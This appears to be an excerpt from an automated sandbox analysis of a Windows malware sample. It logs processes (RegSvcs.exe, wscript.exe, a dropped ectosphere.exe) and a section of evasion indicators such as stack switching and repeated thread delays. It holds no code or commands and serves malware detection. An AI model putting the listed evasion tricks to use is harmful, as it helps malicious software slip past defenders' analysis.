                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeAPI/Special instruction interceptor: Address: F6E224
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeAPI/Special instruction interceptor: Address: 1B4179C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599537Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598419Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598305Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598139Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597919Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597373Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596499Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596279Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595621Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595317Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594296Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599233Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599102Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598992Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598733Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598497Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598171Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597841Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597296Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596968Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596147Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596044Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595915Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594921Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594264Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594154Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594046Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1713Jump to behavior
